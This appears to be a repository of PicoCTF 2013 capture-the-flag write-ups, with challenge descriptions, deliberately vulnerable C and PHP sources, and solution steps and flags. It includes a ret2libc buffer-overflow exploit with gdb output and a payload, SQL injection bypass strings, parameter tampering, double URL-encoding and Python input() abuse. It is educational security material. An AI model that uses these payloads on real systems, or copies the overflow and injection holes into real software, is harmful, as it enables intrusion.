/pico-ctf-2013/first-contact/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: First Contact 2 | 3 | **Category:** Network 4 | **Points:** 40 5 | **Description:** 6 | 7 | > You notice that the indicator light near the robot’s antenna begins to blink. Perhaps the robot is connecting to a network? Using a wireless card and the network protocol analyzer Wireshark, you are able to create a PCAP file containing the packets sent over the network. 8 | > 9 | > You suspect that the robot is communicating with the crashed ship. Your goal is to find the location of the ship by inspecting the network traffic. 10 | > 11 | > You can perform the analysis online on [Cloudshark](http://www.cloudshark.org/captures/bc1c0a7fae2c) or you can download the [PCAP file](https://2013.picoctf.com/problems/first_contact.pcap). 12 | > 13 | > [file offline](first_contact.pcap) 14 | 15 | ## Write-up 16 | 17 | Open file with Wireshark, Select a TCP packet > Follow TCP Stream: 18 | 19 | ``` 20 | AWAITING NEW LOCATION STATUS 21 | NEW LOCATION STATUS: 302 22 | NEW LOCATION COORDINATES: 37 14'06"N 115 48'40"W 23 | NEW LOCATION INFO: LOCKED 24 | NEW LOCATION UPDATE COMPLETE 25 | NEW LOCATION UPDATE SUCCESS 26 | ``` 27 | 28 | **Answer:** ```37 14'06"N 115 48'40"W``` 29 | 30 | ## Other write-ups and resources 31 | 32 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/first-contact/first_contact.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/first-contact/first_contact.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/getkey/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: GETKey 2 | 3 | **Category:** WebVuln 4 | **Points:** 50 5 | **Description:** 6 | 7 | > There's bound to be a key on the spaceport's [hidden website](https://2013.picoctf.com/problems/getquery/index.php) 8 | 9 | ## Write-up 10 | 11 | HTML code similar: 12 | 13 | ```html 14 |
15 | 16 | 17 |

18 |
19 | ``` 20 | 21 | We focus on ```method="GET"```, input will be displayed in the URL 22 | 23 | Origin: 24 | 25 | ``` 26 | [...]/index.php?admin=false&competition=ccdc 27 | ``` 28 | 29 | Solve: 30 | 31 | ``` 32 | [...]/index.php?admin=true&competition=picoctf 33 | 34 | FLAG: 9fa449c061d64f58de600dfacaa6bd5d 35 | ``` 36 | 37 | **Answer:** 9fa449c061d64f58de600dfacaa6bd5d 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/getkey/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 16 | 17 | 18 | FLAG: $key

"); 26 | } else { 27 | echo("Either you aren't admin or wrong competition"); 28 | } 29 | ?> 30 |
31 | 32 | 33 |

34 |
35 | 36 | 37 | -------------------------------------------------------------------------------- /pico-ctf-2013/grep-is-your-friend/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Grep is Your Friend 2 | 3 | **Category:** Trivia 4 | **Points:** 40 5 | **Description:** 6 | 7 | > After plugging the robot into the computer, the robot asks for the name of a file containing the string `SECRET AUTH CODE`. You can find it using the [command-line interface](https://2013.picoctf.com/webshell) in `/problems/grep.tar` or by downloading [all of the files](https://2013.picoctf.com/problems/grep.tar). 8 | > 9 | > [file offline](grep.tar) 10 | 11 | ## Write-up 12 | 13 | In Linux host, extract rar file, then use `grep` command. 14 | 15 | ```bash 16 | $ tar xzvf grep.tar 17 | $ cd grep 18 | $ strings * | grep "SECRET AUTH CODE" 19 | fHYYpdrfeOCHyQicfe96xfw==: SECRET AUTH CODES 20 | ``` 21 | 22 | **Answer:** fHYYpdrfeOCHyQicfe96xfw== 23 | 24 | ## Other write-ups and resources 25 | 26 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: In Hex, No One Can Hear You Complain 2 | 3 | **Category:** Forensic 4 | **Points:** 90 5 | **Description:** 6 | 7 | > While flying through the outskirts of the Ripley system, you notice a distress signal from one of the outer moons. It appears a ship has crash-landed near a 16-sided pyramid. The lone survivor, a [docx file](https://2013.picoctf.com/problems/kane.docx), tells you that a malicious programmer has embedded an egg in his chest and he's afraid that it's going to hatch. He offers his assistance if you can help find the egg. 8 | > 9 | > [Offline file](kane.docx) 10 | 11 | ## Write-up 12 | 13 | First, we need know, the essence of Word file is a normal ZIP file. 14 | 15 | We will extract it. Flag isn't difficult to see: `\word\media\key.png` 16 | 17 | ![](key.png) 18 | 19 | **Answer:** docx_why_not_docz 20 | 21 | ## Other write-ups and resources 22 | 23 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png -------------------------------------------------------------------------------- /pico-ctf-2013/injection/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Injection 2 | 3 | **Category:** Web Vuln 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Use the Loading Bay Control System to get the admin key! [Problem](https://2013.picoctf.com/problems/injection/) 8 | 9 | ## Write-up 10 | 11 | The challenge is called "Injection" and it's a web based authentication page. Chances are this is some kind of SQL Injection challenge, and we need to be able to bypass the authentication, as we don’t know a valid username. 12 | 13 | Google for [sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/) 14 | 15 | Trying `' OR 1=1 #` and it's bug: 16 | 17 | ``` 18 | Username: user177 Hash: 53e33afe47d6951aa21b90741f11e711 19 | 20 | Username: user178 Hash: 7efdd69b03fbb5cf805419bd1044f558 21 | 22 | Username: admin Hash: bad_code_and_databases_is_no_fun 23 | ``` 24 | 25 | **Answer:** bad_code_and_databases_is_no_fun 26 | 27 | ## Other write-ups and resources 28 | 29 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/injection/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Welcome to Loading Bay Control System.

4 |

Please input username to retrieve key.

5 |
6 | Username:
7 |
8 | 9 | Username: " . $row['username']); 21 | echo(" Hash: " . $row['hash'] . "

"); 22 | } 23 | } 24 | mysqli_close($c); 25 | } 26 | else 27 | { 28 | echo("

I'm not allowed to tell you the admin password.

"); 29 | } 30 | } 31 | 32 | ?> 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /pico-ctf-2013/navsat/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: NAVSAT 2 | 3 | **Category:** Forensic 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Near the Sun, you find a malfunctioning warp beacon which is broadcasting a distress signal in a navigational channel. It looks like it's been damaged by solar radiation, and [some of its data](https://2013.picoctf.com/problems/recovery.zip) have been corrupted. If you can recover it, perhaps it will point at you to something interesting. 8 | > 9 | > [Offline file](recovery.zip) 10 | 11 | ## Write-up 12 | 13 | Open with Winrar, we can see "key.txt". But extract file is error. 14 | 15 | ``` 16 | ! [...]\NAVSAT\recovery.zip: The archive is corrupt 17 | ``` 18 | 19 | View file in hex: 20 | 21 | ``` 22 | 00000000 3F 3F 03 04 0A 00 00 00 00 00 22 79 8E 42 F6 7D ??........"yŽBö} 23 | 00000010 2E EF 1B 00 00 00 1B 00 00 00 0F 00 1C 00 4D 61 .ï............Ma 24 | 00000020 67 37 2D 42 57 2F 6B 65 79 2E 74 78 74 55 54 09 g7-BW/key.txtUT. 25 | 00000030 00 03 D0 FE 6A 51 0B FF 6A 51 75 78 0B 00 01 04 ..ÐþjQ.ÿjQux.... 26 | 00000040 E8 03 00 00 04 E8 03 00 00 4B 65 79 3A 20 4E 65 è....è...Key: Ne 27 | 00000050 78 74 20 73 74 6F 70 20 54 61 75 20 45 72 69 64 xt stop Tau Erid 28 | 00000060 61 6E 69 0A 50 4B 03 04 14 00 00 00 08 00 27 B6 ani.PK........'¶ 29 | 00000070 47 32 1B A6 C8 9C E4 52 04 00 8C 36 05 00 14 00 G2.¦ÈœäR..Œ6.... 30 | 00000080 1C 00 4D 61 67 37 2D 42 57 2F 43 68 61 72 74 2D ..Mag7-BW/Chart- 31 | 00000090 31 35 2E 70 64 66 55 54 09 00 03 BA 36 08 42 AF 15.pdfUT...º6.B¯ 32 | ``` 33 | 34 | Now, contents of key.txt is display. 35 | 36 | ``` 37 | 00000040 E8 03 00 00 04 E8 03 00 00 4B 65 79 3A 20 4E 65 è....è...Key: Ne 38 | 00000050 78 74 20 73 74 6F 70 20 54 61 75 20 45 72 69 64 xt stop Tau Erid 39 | 00000060 61 6E 69 0A 50 4B 03 04 14 00 00 00 08 00 27 B6 ani.PK........'¶ 40 | ``` 41 | 42 | Other way, we can determine file signature ZIP is `50 4B 03 04`, `3F 3F 03 04` is corrupt signature. 43 | 44 | We can edit 2 byte first to fix. Then, open with Winrar, extract is ok. 45 | 46 | **Answer:** Next stop Tau Eridani 47 | 48 | ## Other write-ups and resources 49 | 50 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/navsat/recovery.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/navsat/recovery.zip -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-1/overflow1-3948d17028101c40: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-1/overflow1-3948d17028101c40 -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-1/overflow1-3948d17028101c40.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "dump_stack.h" 7 | 8 | void vuln(int tmp, char *str) { 9 | int win = tmp; 10 | char buf[64]; 11 | strcpy(buf, str); 12 | dump_stack((void **) buf, 23, (void **) &tmp); 13 | printf("win = %d\n", win); 14 | if (win == 1) { 15 | execl("/bin/sh", "sh", NULL); 16 | } else { 17 | printf("Sorry, you lose.\n"); 18 | } 19 | exit(0); 20 | } 21 | 22 | int main(int argc, char **argv) { 23 | if (argc != 2) { 24 | printf("Usage: stack_overwrite [str]\n"); 25 | return 1; 26 | } 27 | 28 | uid_t euid = geteuid(); 29 | setresuid(euid, euid, euid); 30 | vuln(0, argv[1]); 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "dump_stack.h" 7 | 8 | void vuln(int win, char *str) { 9 | char buf[64]; 10 | strcpy(buf, str); 11 | dump_stack((void **) buf, 23, (void **) &win); 12 | printf("win = %d\n", win); 13 | if (win == 1) { 14 | execl("/bin/sh", "sh", NULL); 15 | } else { 16 | printf("Sorry, you lose.\n"); 17 | } 18 | exit(0); 19 | } 20 | 21 | int main(int argc, char **argv) { 22 | if (argc != 2) { 23 | printf("Usage: stack_overwrite [str]\n"); 24 | return 1; 25 | } 26 | 27 | uid_t euid = geteuid(); 28 | setresuid(euid, euid, euid); 29 | vuln(0, argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | uid_t euid = geteuid(); 27 | setresuid(euid, euid, euid); 28 | printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run a shell. 9 | */ 10 | 11 | void vuln(char *str) { 12 | char buf[64]; 13 | strcpy(buf, str); 14 | dump_stack((void **) buf, 21, (void **) &str); 15 | } 16 | 17 | int main(int argc, char **argv) { 18 | if (argc != 2) { 19 | printf("Usage: buffer_overflow_shellcode [str]\n"); 20 | return 1; 21 | } 22 | 23 | uid_t euid = geteuid(); 24 | setresuid(euid, euid, euid); 25 | vuln(argv[1]); 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-5/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Overflow 5 2 | 3 | **Category:** Binary Exploitation 4 | **Points:** 190 5 | **Description:** 6 | 7 | >Stack overflows are the most basic binary exploitation technique, but they 8 | >take a lot of skill to master. If you already know some C, these problems can 9 | >help acquaint you with stacks and binary exploitation in general. 10 | 11 | >Problem available on the shell machine in 12 | >/problems/stack_overflow_5_0353c1a83cb2fa0d , downloadable [here](https://2013.picoctf.com/problems/overflow5-0353c1a83cb2fa0d). Source is not 13 | >available for this problem. 14 | 15 | >If you solve the problem you will be able to read the key file by running 16 | 17 | >cat /problems/stack_overflow_5_0353c1a83cb2fa0d/key 18 | >on the PicoCTF shell machine. 19 | 20 | >**Hint:** Now you don't have source, and you aren't allowed to execute code 21 | >on the stack. Keep calm and objdump -d 22 | 23 | 24 | ## Write-up 25 | **Disclaimer: I've spoken to people who solved this during the actual contest. They 26 | said that using ulimit to solve this problem was encouraged and/or hinted at by 27 | the creators. In addition, I haven't been able to exploit it with ASLR 28 | enabled.** 29 | 30 | **Disclaimer 2: While the technique will remain the same, solving this on the 31 | server will yield very different results.** 32 | 33 | No source. The first thing we should do is just find the offset to hijack `%eip` 34 | ``` 35 | $ strace ./overflow5-0353c1a83cb2fa0d $(python -c 'print "A"*1036 + "BBBB"') 36 | ... 37 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- 38 | ``` 39 | 1036 bytes and then we have control over eip. Now what we do is use gdb with 40 | the ASLR disabled to find the address of some important items, namely 41 | `system()` and the address of "/bin/sh" in libc. 42 | ``` 43 | $ setarch `uname -m` -R gdb -q ./overflow5-0353c1a83cb2fa0d 44 | Reading symbols from ./overflow5-0353c1a83cb2fa0d...(no debugging symbols 45 | found)...done. 46 | (gdb) b*main 47 | Breakpoint 1 at 0x80483c0 48 | (gdb) r 49 | Starting program: 50 | /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 51 | 52 | Breakpoint 1, 0x080483c0 in main () 53 | (gdb) p system 54 | $1 = {} 0xf7e62190 55 | (gdb) info proc map 56 | process 6912 57 | Mapped address spaces: 58 | 59 | Start Addr End Addr Size Offset objfile 60 | 0x8048000 0x8049000 0x1000 0x0 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 61 | 0x8049000 0x804a000 0x1000 0x0 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 62 | 0x804a000 0x804b000 0x1000 0x1000 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 63 | 0xf7e21000 0xf7e22000 0x1000 0x0 64 | 0xf7e22000 0xf7fca000 0x1a8000 0x0 /lib/i386-linux-gnu/libc-2.19.so 65 | 0xf7fca000 0xf7fcc000 0x2000 0x1a8000 /lib/i386-linux-gnu/libc-2.19.so 66 | 0xf7fcc000 0xf7fcd000 0x1000 0x1aa000 /lib/i386-linux-gnu/libc-2.19.so 67 | 0xf7fcd000 0xf7fd0000 0x3000 0x0 68 | 0xf7fd9000 0xf7fdb000 0x2000 0x0 69 | 0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso] 70 | 0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.19.so 71 | 0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.19.so 72 | 0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.19.so 73 | 0xfffdd000 0xffffe000 0x21000 0x0 [stack] 74 | (gdb) find 0xf7e22000, +9999999,"/bin/sh" 75 | 0xf7f82a24 76 | ``` 77 | Now that we have the address of system and "/bin/sh" we can happily call that 78 | function, providing /bin/sh as the argument 79 | 80 | ``` 81 | setarch `uname -m` -R ./overflow5-0353c1a83cb2fa0d $(python -c 'print "A"*1036 82 | + "\x90\x21\xe6\xf7" + "JUNK" + "\x24\x2a\xf8\xf7"') 83 | ``` 84 | pwn. 85 | 86 | ## Other write-ups and resources 87 | 88 | * none yet 89 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d -------------------------------------------------------------------------------- /pico-ctf-2013/php2/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP2 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 90 5 | **Description:** 6 | 7 | > We found a [simple web page](https://2013.picoctf.com/problems/php2/) that seems to want us to authenticate, but we can't figure out how... can you? 8 | 9 | ## Write-up 10 | > In this challenge we're exploiting a simple PHP script. Our goal is to get the flag to print. 11 | > We can find the script's source at [https://2013.picoctf.com/problems/php2/index.phps](https://2013.picoctf.com/problems/php2/index.phps) 12 | > Our script: 13 | 14 | ``` 15 | not allowed!

"); 18 | exit(); 19 | } 20 | 21 | $_GET[id] = urldecode($_GET[id]); 22 | if($_GET[id] == "admin") 23 | { 24 | echo "

Access granted!

"; 25 | echo "

Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

"; 26 | } 27 | ?> 28 | 29 | 30 |

31 | Can you authenticate to this website? 32 | 33 | ``` 34 | > The script first calls ergi() to see if the GET variable 'id' equals 'admin'. If it does then it exits . 35 | > The script then calls urldecode() on the 'id' variable and then checks to see if that equals 'admin'. 36 | > We can exploit the script by URL encoding the word 'admin' (using the chart [here](http://www.w3schools.com/tags/ref_urlencode.asp) then using the encoded word as the id variable . 37 | > Note we also need to encode the % sign because there are one character url encodes (i.e. %8 is backspace). 38 | > Solution: 39 | > https://2013.picoctf.com/problems/php2/index.php?id=%2561%2564%256d%2569%256e 40 | 41 | **Answer: b4cc845aa05ed9b0ce823cb04f253e27** 42 | 43 | ## Other write-ups and resources 44 | 45 | * [https://github.com/BatmansKitchen/ctf-writeups/tree/master/2013-picoctf/PHP2](https://github.com/BatmansKitchen/ctf-writeups/tree/master/2013-picoctf/PHP2) 46 | * [https://github.com/innoying/hydrantlabs.org-old/blob/master/content/Security/picoCTF/2013/PHP2/index.jade](https://github.com/innoying/hydrantlabs.org-old/blob/master/content/Security/picoCTF/2013/PHP2/index.jade) 47 | -------------------------------------------------------------------------------- /pico-ctf-2013/php3/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP 3 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 120 5 | **Description:** 6 | 7 | > It looks like [this site](http://2013.picoctf.com/problems/php3/) uses MD5 to hash passwords, but I don't think they're doing it quite right... 8 | 9 | ## Write-up 10 | We're given the following script and the task of exploiting it to get the flag. 11 | ``` 12 | 13 | 14 | Secure Web Login 15 | 16 | 17 | Logged in! Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

"; 28 | } 29 | 30 | if($query[user] != "admin") { 31 | echo("

You are not admin!

"); 32 | } 33 | } 34 | 35 | ?> 36 | 37 | 38 | 39 | 40 | 41 | 42 | Source 43 | 44 | ``` 45 | > We can solve the challenge simply by putting in **admin') --** as the username and **pass** as the password. 46 | > This converts the mySQL query in the script to treat everything after the username as a comment. Thus giving us the answer. 47 | 48 | ***Note as of 12 March 2016 , this challenge is offline. This writeup is included for learning purposes.*** 49 | 50 | **Answer: 8ab9b92c174dd483ad17cee1bb0c5bdb** 51 | 52 | ## Other write-ups and resources 53 | 54 | * [http://blog.phuongnam.org/2013/07/picoctf.html](http://blog.phuongnam.org/2013/07/picoctf.html) 55 | * [https://github.com/elc1798/stuyfyre-picoctf-2013/blob/master/PHP3-120/Solution.txt](https://github.com/elc1798/stuyfyre-picoctf-2013/blob/master/PHP3-120/Solution.txt) 56 | -------------------------------------------------------------------------------- /pico-ctf-2013/php4/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP 4 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 110 5 | **Description:** 6 | 7 | > It looks like our web administrators updated their MD5 code after the PHP3 fiasco. However, I still don't think they fixed all the bugs on [this site](http://2013.picoctf.com/problems/php4/). 8 | > Can you show them what they did wrong by logging in again? 9 | 10 | ## Write-up 11 | *None Yet* 12 | 13 | **Answer: 50c90a07790d4d0ab7fc7f695cb61d0e** 14 | 15 | ## Other write-ups and resources 16 | 17 | * [http://sturzu.org/2013/05/07/picoctf-writeup-php4-110](http://sturzu.org/2013/05/07/picoctf-writeup-php4-110) 18 | * [https://dook.biz/2015/02/picoctf-2013-php4-writeup/](https://dook.biz/2015/02/picoctf-2013-php4-writeup/) 19 | -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Pilot Logic 2 | 3 | **Category:** Forensic 4 | **Points:** 75 5 | **Description:** 6 | 7 | > You've gotten a [partial dump of the disk](https://2013.picoctf.com/problems/pilot_image) from the hangar's machine, and you're pretty sure the pilot's password is *cleverly hidden* somewhere within it... 8 | > 9 | > The disk image can be found on the shell machines at `/problems/pilot_logic.img` and the contents of the image are available in `/problems/pilot_logic/` 10 | > 11 | > [offline file](pilot_image) 12 | 13 | ## Write-up 14 | 15 | Use tool [Autopsy](http://www.sleuthkit.org/autopsy/) > Create NewCase and import image file into it. 16 | 17 | ![](solve.png) 18 | 19 | ``` 20 | The pilot's passphase is "You can't take the sky from me" 21 | ``` 22 | 23 | **Answer:** You can't take the sky from me 24 | 25 | ## Other write-ups and resources 26 | 27 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/pilot_image: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/pilot-logic/pilot_image -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/pilot-logic/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/pretty-hard-programming/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Pretty Hard Programming 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 95 5 | **Description:** 6 | 7 | > If you can guess the admin's password you can get a key 8 | > [Problem](https://2013.picoctf.com/problems/php1/)[Source](https://2013.picoctf.com/problems/php1/index.phps) 9 | 10 | ## Write-up 11 | Looking at the source code we see that we must get the password variable to match the secret_key variable. 12 | We also notice that the variables are extracted (initialized) when we send a GET request. Changing the url to: 13 | https://2013.picoctf.com/problems/php1/index.php?password=fakepassword&secret_key=fakepassword give us the flag. 14 | 15 | **Answer:** php_means_youre_going_to_have_a_bad_time 16 | 17 | ## Other write-ups and resources 18 | 19 | * none yet 20 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-1/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 1 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 85 5 | **Description:** 6 | 7 | > A wise master wishes to teach you an ancient art: [Python Eval 1](https://2013.picoctf.com/problems/pyeval/stage1.html). 8 | 9 | ## Write-up 10 | 11 | > This challenge involves exploiting a Python input 'eval' function. 12 | 13 | > Our objective for this challenge is to get the following script (running at python.picoctf.com 6361) to print out the 'flag' variable. 14 | 15 | ``` 16 | # task1.py 17 | print "Welcome to mystery math!" 18 | 19 | flag = "xxxxxxxxxx" 20 | 21 | while True: 22 | x = input("Enter number 1> ") 23 | x = x*x + ord(flag[0]) * ord(flag[1]) + ord(flag[2]) * x 24 | y = input("Enter number 2> ") 25 | if y / 6 + 7 - y == x: 26 | print "Here ya go! ", flag 27 | exit(0) 28 | else: 29 | print "Your lucky number is ", x - y 30 | ``` 31 | 32 | > We can see that the script uses the x and y variables as 'keys' to print out the flag and that it defines those variables with the vulnerable input function. 33 | > After the variables have been defined, the script calculates whether they are correct using the integer representation of the flag's first three letters as an additional secret. 34 | 35 | > Since the input function will attempt to evaluate whatever we pass it, we can make the Python interperter give us the flag by making it throw an exception. 36 | > Entering *int(flag)* will make the program crash with the answer. 37 | ``` 38 | Enter number 1> int(flag) 39 | Traceback (most recent call last): 40 | File "/home/py1/task1.py", line 8, in 41 | x = input("Enter number 1> ") 42 | File "", line 1, in 43 | ValueError: invalid literal for int() with base 10: 'eval_is_best_thing_evar' 44 | ``` 45 | 46 | **Answer: eval_is_best_thing_evar** 47 | 48 | ## Other write-ups and resources 49 | 50 | * none yet 51 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-2/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 2 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 90 5 | **Description:** 6 | 7 | > It is recommended that you complete Python Eval 1 before trying [Python Eval 2](https://2013.picoctf.com/problems/pyeval/stage2.html). 8 | 9 | ## Write-up 10 | >This challenge is very similiar to Python Eval 1 and also involves exploiting a Python script's input function. 11 | > We're given the following script (running at python.picoctf.com 6362) and are expected to get the program to print out the flag variable. 12 | 13 | ``` 14 | # task2.py 15 | from random import randint 16 | 17 | def printpegs(code): 18 | print " --------------------- " 19 | print " |", 20 | for c in code: 21 | print c, "|", 22 | print "" 23 | print " --------------------- " 24 | 25 | print "Master Mind Game" 26 | 27 | flag = "xxxxxxxxxx" 28 | 29 | mm_code = (randint(0,9), randint(0,9), randint(0,9), randint(0,9), randint(0,9)) 30 | print "I've set my code. Guess it!" 31 | 32 | print "Rules: You should input your guesses as 5 digits separated by commas." 33 | print " I will respond by marking the correct digits with a 2, marking" 34 | print " digits in the wrong place with a 1, and marking wrong digits 0." 35 | 36 | while True: 37 | guess = input('guess> ') 38 | if len(guess) != 5: 39 | print "You must guess a 5-digit code!" 40 | continue 41 | 42 | printpegs(guess) 43 | 44 | right = map(lambda x,y: (x == y) + (x in mm_code), guess, mm_code) 45 | printpegs(right) 46 | 47 | if guess == mm_code: 48 | print "You got it right!" 49 | exit(0) 50 | ``` 51 | > This script defines a 'guess' variable with the vulnerable input function. It then calculates wheter the guess is correct. 52 | 53 | > We can solve this challenge by causing the program to throw an exception. 54 | 55 | >Inputting *int(flag)* gives us the answer. 56 | ``` 57 | guess> int(flag) 58 | Traceback (most recent call last): 59 | File "/home/py2/task2.py", line 25, in 60 | guess = input('guess> ') 61 | File "", line 1, in 62 | ValueError: invalid literal for int() with base 10: 'i_are_a_pyeval_mastermind' 63 | ``` 64 | 65 | 66 | 67 | **Answer: i_are_a_pyeval_mastermind** 68 | 69 | ## Other write-ups and resources 70 | 71 | * none yet 72 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-3/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 3 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Give Python Eval 1 and 2 a shot before moving on to [Python Eval 3](https://2013.picoctf.com/problems/pyeval/stage3.html). 8 | 9 | ## Write-up 10 | >This challenge involves exploiting a Python script's input 'eval' function using the script's imports. 11 | 12 | > We're given the follwing script and the task of getting a shell to read the flag. 13 | 14 | ``` 15 | # task3.py 16 | # Remember kids: this is bad code. Try not code like this :P 17 | from os import path 18 | del __builtins__.__dict__['__import__'] 19 | del __builtins__.__dict__['reload'] 20 | 21 | print "Welcome to the food menu!" 22 | choices = ( 23 | ("Chicken Asada Burrito", 7.69, "caburrito.txt"), 24 | ("Beef Chow Mein", 6.69, "beefchow.txt"), 25 | ("MeatBurger Deluxe", 10.49, "no description"), 26 | # ... 27 | ) 28 | 29 | def print_description(n): 30 | print "" 31 | if n >= 